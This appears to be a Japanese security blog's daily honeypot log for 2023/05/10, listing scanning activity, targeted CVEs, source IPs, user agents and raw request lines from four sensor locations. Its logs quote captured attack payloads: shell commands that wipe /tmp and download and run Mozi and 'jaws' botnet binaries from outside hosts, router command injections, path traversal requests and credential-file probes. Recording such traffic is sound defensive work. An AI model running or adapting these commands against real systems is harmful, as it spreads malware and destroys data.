コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/05/10 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2023/05/10分です。

特徴
共通

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.awsへのスキャン行為
/.envへのスキャン行為

Location:JP

fasthttpによるスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
5.188.210.227に関する不正通信

を確認しました。

Location:US

NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
webprosbotによるスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  5.255.111.128/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
/.gitへのスキャン行為
5.188.210.227に関する不正通信

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  5.255.111.128/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:294 (前日比:163)
US:総アクセス数:142 (前日比:-24)
UK:総アクセス数:102 (前日比:-246)
SG:総アクセス数:110 (前日比:-4)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
2 4.17.224.132 United States
1 4.154.83.105 United States
1 5.188.210.227 Russia
2 8.222.181.70 Singapore
1 20.245.100.243 United States
2 34.242.221.14 United States
2 35.195.57.117 United States
2 41.251.249.88 Morocco
1 43.137.34.39 China
19 43.154.141.71 Singapore
7 44.200.25.189 United States
1 45.33.80.243 United States
1 45.56.108.128 United States
2 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.94 United States
1 45.79.181.179 United States
1 45.79.181.223 United States
145 52.221.248.39 United States
1 54.193.127.79 United States
1 54.241.136.58 United States
1 61.184.84.212 China
2 63.214.171.26 United States
1 65.132.186.86 United States
2 65.141.6.170 United States
1 67.220.86.221 United States
2 68.66.164.26 United States
2 69.162.243.124 United States
1 71.6.134.232 United States
2 71.127.254.129 United States
1 86.38.225.169 Lithuania
1 87.121.221.49 Bulgaria
2 89.114.94.207 Portugal
2 91.126.74.133 Spain
2 103.60.60.186 Singapore
1 104.192.0.50 United States
1 107.172.233.156 United States
2 109.237.98.226 Russia
1 115.28.152.93 China
3 118.201.94.238 Singapore
15 135.125.244.48 France
4 139.60.150.14 United States
1 139.170.203.83 China
2 141.193.195.165 United States
2 146.190.41.214 United States
4 152.32.227.23 Hong Kong
1 157.97.134.23 Germany
1 162.142.125.216 United States
2 167.71.229.198 United States
1 167.94.138.126 United States
2 167.99.13.19 United States
1 167.248.133.34 United States
7 170.64.158.184 United States
1 172.104.11.4 United States
1 172.104.11.34 United States
1 172.104.11.51 United States
1 175.107.13.253 Pakistan
2 185.100.87.136 Seychelles
3 185.254.196.173 Ukraine
3 185.254.196.186 Ukraine
2 188.119.51.126 Turkey
1 193.35.18.65 Bulgaria
1 198.235.24.143 United States
1 205.210.31.210 United States
4 206.226.64.150 United States
1 209.97.182.164 United States
4 216.163.200.22 United States

UserAgent一覧

件数 UserAgent
24 -
4 Go-http-client/1.1
1 Mozila/5.0
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
19 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
212 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148
6 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
2 Python-urllib/3.10
2 fasthttp

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\t\x01
1 \x16\x03\x01\x01\xfa\x01
19 \x16\x03\x01
3 GET /.aws/credentials HTTP/1.1
1 GET /.docker/.env HTTP/1.1
1 GET /.docker/laravel/app/.env HTTP/1.1
1 GET /.env.backup HTTP/1.1
1 GET /.env.dev HTTP/1.1
1 GET /.env.dist HTTP/1.1
1 GET /.env.example HTTP/1.1
1 GET /.env.local HTTP/1.1
1 GET /.env.save HTTP/1.1
1 GET /.env.stage HTTP/1.1
1 GET /.env.www HTTP/1.1
1 GET /.env_1 HTTP/1.1
31 GET /.env HTTP/1.1
1 GET /.envs HTTP/1.1
1 GET /.env~ HTTP/1.1
2 GET /.git/HEAD HTTP/1.1
1 GET /.gitlab-ci/.env HTTP/1.1
1 GET /.s3cfg HTTP/1.1
1 GET /.vscode/.env HTTP/1.1
1 GET /.wp-config.php.swp HTTP/1.1
1 GET /99vt HTTP/1.1
1 GET /99vu HTTP/1.1
1 GET /__tests__/test-become/.env HTTP/1.1
1 GET /_phpinfo.php HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
3 GET /aaa9 HTTP/1.1
1 GET /aaaaaaaaaaaaaaaaaaaaaaaaaqr HTTP/1.1
3 GET /aab8 HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
2 GET /admin/.env HTTP/1.1
1 GET /admin/dashboard/info.php HTTP/1.1
1 GET /admin/phpinfo.php HTTP/1.1
1 GET /alpha/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /api/phpinfo.php HTTP/1.1
1 GET /api/src/.env HTTP/1.1
1 GET /api/src HTTP/1.1
1 GET /apis/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
2 GET /app/config/.env HTTP/1.1
1 GET /app/config/dev/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /assets/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
2 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /beta/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /blogs/.env HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /bootstrap/.env HTTP/1.1
1 GET /cgi-bin/.env HTTP/1.1
1 GET /check.php HTTP/1.1
1 GET /client/.env HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /config.env HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config/.env HTTP/1.1
1 GET /configuration.php HTTP/1.1
1 GET /content/.env HTTP/1.1
2 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /crm/.env.production HTTP/1.1
2 GET /crm/.env HTTP/1.1
1 GET /d/.env HTTP/1.1
1 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /dashboard/test.php HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /debug/default HTTP/1.1
1 GET /demo/.env HTTP/1.1
1 GET /dev/.env HTTP/1.1
1 GET /develop/info.php HTTP/1.1
1 GET /development/.env HTTP/1.1
2 GET /docs/.env HTTP/1.1
1 GET /download/.env HTTP/1.1
1 GET /en/.env HTTP/1.1
1 GET /env/.env HTTP/1.1
1 GET /environment HTTP/1.1
1 GET /envrc HTTP/1.1
1 GET /export/.env HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /files/.env HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
1 GET /gate.php HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /home/.env HTTP/1.1
1 GET /i.php HTTP/1.1
1 GET /icons/.env HTTP/1.1
1 GET /images/.env HTTP/1.1
1 GET /img/.env HTTP/1.1
1 GET /index.js HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /info/phpinfo.php HTTP/1.1
1 GET /info1.php HTTP/1.1
1 GET /kyc/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /laravel/core/.env HTTP/1.1
2 GET /lib/.env HTTP/1.1
1 GET /live/.env.staging HTTP/1.1
1 GET /local-phpinfo.php HTTP/1.1
2 GET /local/.env HTTP/1.1
1 GET /login/.env HTTP/1.1
1 GET /mailer/.env HTTP/1.1
2 GET /manager/html HTTP/1.1
1 GET /manual/.env HTTP/1.1
1 GET /media/.env HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /p.php HTTP/1.1
1 GET /php-info.php HTTP/1.1
1 GET /php-info HTTP/1.1
1 GET /php.ini HTTP/1.1
1 GET /php.php HTTP/1.1
1 GET /php/phpinfo.php HTTP/1.1
1 GET /php_info.php HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo/phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /phptest.php HTTP/1.1
1 GET /pi.php HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /prod/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /results/.env HTTP/1.1
4 GET /robots.txt HTTP/1.1
1 GET /root/infophp HTTP/1.1
1 GET /script/.env HTTP/1.1
1 GET /scripts/.env HTTP/1.1
1 GET /server/.env HTTP/1.1
1 GET /server/phpinfo.php HTTP/1.1
1 GET /services/.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
2 GET /site/.env HTTP/1.1
2 GET /sitemap.xml HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /staging/.env HTTP/1.1
1 GET /static/.env HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /temp.php HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /test/.env HTTP/1.1
1 GET /test1.php HTTP/1.1
1 GET /test2.php HTTP/1.1
1 GET /testing.php HTTP/1.1
1 GET /testphpinfo HTTP/1.1
1 GET /tools/info.php HTTP/1.1
1 GET /upl.php HTTP/1.1
1 GET /uploads/.env HTTP/1.1
1 GET /v2/.env HTTP/1.1
1 GET /v3/time HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /website/.env HTTP/1.1
1 GET /wp-admin/.env HTTP/1.1
1 GET /wp-config.backup HTTP/1.1
1 GET /wp-config.bak HTTP/1.1
1 GET /wp-config.orig HTTP/1.1
1 GET /wp-config.php. HTTP/1.1
1 GET /wp-config.php.bak HTTP/1.1
1 GET /wp-config.php.bk HTTP/1.1
1 GET /wp-config.php.orig HTTP/1.1
1 GET /wp-config.php.save HTTP/1.1
1 GET /wp-config.php_ HTTP/1.1
1 GET /wp-config.php_bk HTTP/1.1
1 GET /wp-config.php_old HTTP/1.1
1 GET /wp-config.php_orig HTTP/1.1
1 GET /wp-config.php HTTP/1.1
1 GET /wp-config.php~ HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
19 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /__tests__/test-become HTTP/1.1
1 POST /admin HTTP/1.1
1 POST /app/config HTTP/1.1
1 POST /backend HTTP/1.1
1 POST /base HTTP/1.1
1 POST /blogs HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin HTTP/1.1
1 POST /core HTTP/1.1
2 POST /crm HTTP/1.1
1 POST /database HTTP/1.1
1 POST /docs HTTP/1.1
1 POST /index.htm HTTP/1.1
1 POST /lib HTTP/1.1
1 POST /local HTTP/1.1
1 POST /new HTTP/1.1
1 POST /site HTTP/1.1
1 POST /vendor HTTP/1.1
1 POST /wp-admin HTTP/1.1
1 POST /wp-content HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.158.171 Russia
1 14.162.157.64 Vietnam
1 14.188.31.143 Vietnam
1 20.1.154.236 United States
2 20.219.188.145 United States
1 34.148.16.57 United States
7 35.216.237.60 United States
2 35.244.121.183 United States
1 44.201.200.148 United States
3 45.33.80.243 United States
1 45.79.172.21 United States
1 45.79.181.104 United States
1 45.79.181.223 United States
5 45.95.169.240 Croatia
19 51.79.29.48 Canada
4 54.37.79.75 France
1 54.193.127.79 United States
1 59.92.168.192 India
1 61.184.84.212 China
1 87.121.221.49 Bulgaria
1 107.170.246.30 United States
1 109.207.200.43 Ukraine
2 109.237.98.226 Russia
1 113.160.173.132 Vietnam
1 113.171.54.143 Vietnam
1 113.186.6.77 Vietnam
1 115.28.152.93 China
1 117.25.124.33 China
1 120.86.252.142 China
1 120.87.197.118 China
1 123.27.124.60 Vietnam
3 124.222.87.136 China
1 138.68.161.189 United States
7 138.197.10.115 United States
1 142.147.96.167 Canada
6 152.32.240.210 Hong Kong
4 152.89.196.144 Russia
1 159.203.192.10 United States
7 161.35.86.15 United States
2 162.142.125.11 United States
1 165.232.170.200 United States
2 167.172.89.248 United States
1 172.104.11.4 United States
1 172.104.11.34 United States
1 172.105.128.11 United States
2 172.105.128.13 United States
2 183.136.225.32 China
2 184.105.247.254 United States
1 185.180.143.190 Portugal
18 185.246.221.75 Bulgaria
1 188.165.87.108 France
2 192.155.90.118 United States
2 193.35.18.65 Bulgaria
1 193.35.18.251 Bulgaria
1 198.20.101.106 United States
1 198.235.24.2 United States
1 198.235.24.21 United States
2 212.224.93.194 Germany
1 217.138.221.213 United Kingdom

UserAgent一覧

件数 UserAgent
38 -
1 Go-http-client/1.1
1 Hello, world
2 Mozila/5.0
1 Mozilla/5.0 (Linux; Android 7.1.1; Coolpad 3632A Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1
6 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
18 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4624.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/547.39 (KHTML, like Gecko) Chrome/75.0.1240 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/569.45 (KHTML, like Gecko) Chrome/91.0.2495 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/599.50 (KHTML, like Gecko) Chrome/104.0.2799 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
4 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0
1 python-requests/2.28.1
1 webprosbot/2.0 (+mailto:abuse-6337@webpros.com)

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\xfb\x01
25 \x16\x03\x01
1 \x16\x03\x02\x01o\x01
1 CONNECT blank[.]org:443 HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
30 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
2 GET /actuator/gateway/routes HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /axis2-admin/ HTTP/1.1
1 GET /axis2/ HTTP/1.1
1 GET /axis2/axis2-admin/ HTTP/1.1
1 GET /cgi-bin/authLogin.cgi HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /conf/.env HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /debug/default/view.html HTTP/1.1
8 GET /favicon.ico HTTP/1.1
1 GET /frontend/web/debug/default/view HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /library/.env HTTP/1.1
2 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /phpmyadmin4.8.5/index.php HTTP/1.1
1 GET /pmd/index.php HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /sapi/debug/default/view HTTP/1.1
1 GET /sendgrid.env HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
6 GET /shell?cd+/tmp;rm+-rf+*;wget+ 5.255.111.128/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /sites/all/libraries/mailchimp/.env HTTP/1.1
1 GET /symfony/public/_profiler/phpinfo HTTP/1.1
1 GET /telescope/requests HTTP/1.1
2 GET /tool/view/phpinfo.view.php HTTP/1.1
2 GET /upl.php HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /web/debug/default/view HTTP/1.1
1 GET /wp-config.php-backup HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 GET /wp-content/ HTTP/1.1
1 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.0
2 POST /HNAP1/ HTTP/1.1
5 POST /boaform/admin/formLogin HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
2 31.41.244.111 Russia
1 45.79.181.94 United States
1 45.79.181.179 United States
2 45.79.181.251 United States
2 45.95.169.240 Croatia
2 45.155.91.55 Hong Kong
21 54.37.79.75 France
1 54.193.127.79 United States
1 54.241.136.58 United States
1 59.45.143.3 China
1 61.1.235.181 India
1 64.62.197.18 United States
1 64.62.197.26 United States
7 64.226.93.168 United States
1 66.175.213.4 United States
1 87.121.221.49 Bulgaria
2 90.151.171.108 Russia
6 104.248.80.215 United States
2 109.237.98.226 Russia
2 124.223.103.201 China
1 125.127.139.5 China
4 152.89.196.144 Russia
1 161.35.233.14 United States
2 162.142.125.121 United States
2 167.94.138.127 United States
2 167.248.133.37 United States
1 171.22.30.127 Bulgaria
1 172.104.11.34 United States
1 172.104.11.46 United States
1 172.104.11.51 United States
2 172.105.128.13 United States
2 179.43.177.243 Panama
1 179.43.183.210 Panama
2 183.136.225.32 China
1 185.180.143.49 Portugal
8 185.180.143.140 Portugal
1 188.165.87.96 France
1 192.155.90.118 United States
1 192.155.90.220 United States
1 192.241.201.45 United States
2 193.35.18.60 Bulgaria
2 193.35.18.65 Bulgaria
2 193.35.18.251 Bulgaria
1 198.235.24.195 United States
1 205.210.31.144 United States

UserAgent一覧

件数 UserAgent
26 -
2 Go-http-client/1.1
1 Hello, world
4 Mozila/5.0
1 Mozilla/5.0 (Linux; Android 5.1; A1601) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
2 Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)
22 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 15_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.101 Mobile/15E148 Safari/604.1
1 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0
1 Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 \x16\x03\x01\x01H\x01
19 \x16\x03\x01
2 \x16\x03\x03
1 CONNECT checkip[.]amazonaws[.]com:443 HTTP/1.1
2 CONNECT google[.]com:443 HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
23 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/ HTTP/1.1
1 GET /cgi-bin/authLogin.cgi HTTP/1.1
2 GET /client/get_targets HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
1 GET /explore HTTP/1.1
8 GET /favicon.ico HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /sugar_version.json HTTP/1.1
2 GET /upl.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET http[:]//checkip[.]amazonaws[.]com?Z72612114222Q1 HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
4 POST /HNAP1/ HTTP/1.1
5 POST /boaform/admin/formLogin HTTP/1.1
1 POST /mgmt/tm/util/bash HTTP/1.1
3 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 4.154.83.105 United States
1 5.188.210.227 Russia
11 18.205.59.233 United States
1 20.55.53.144 United States
1 27.215.176.62 China
2 31.41.244.111 Russia
2 35.246.41.13 United States
1 45.33.80.243 United States
1 45.56.108.128 United States
1 45.79.172.21 United States
1 45.79.181.104 United States
1 45.79.181.223 United States
2 45.95.169.240 Croatia
18 51.79.29.48 Canada
1 54.78.148.173 United States
1 54.193.127.79 United States
1 54.241.136.58 United States
1 64.62.197.143 United States
1 64.62.197.146 United States
1 66.175.213.4 United States
7 68.183.39.61 United States
1 68.183.39.115 United States
1 87.121.221.49 Bulgaria
2 87.251.64.11 Russia
1 104.211.220.126 United States
1 107.172.233.156 United States
1 109.207.200.43 Ukraine
2 109.237.98.226 Russia
1 113.90.13.169 China
1 113.190.191.129 Vietnam
1 143.42.47.241 United States
2 146.190.41.214 United States
4 152.89.196.144 Russia
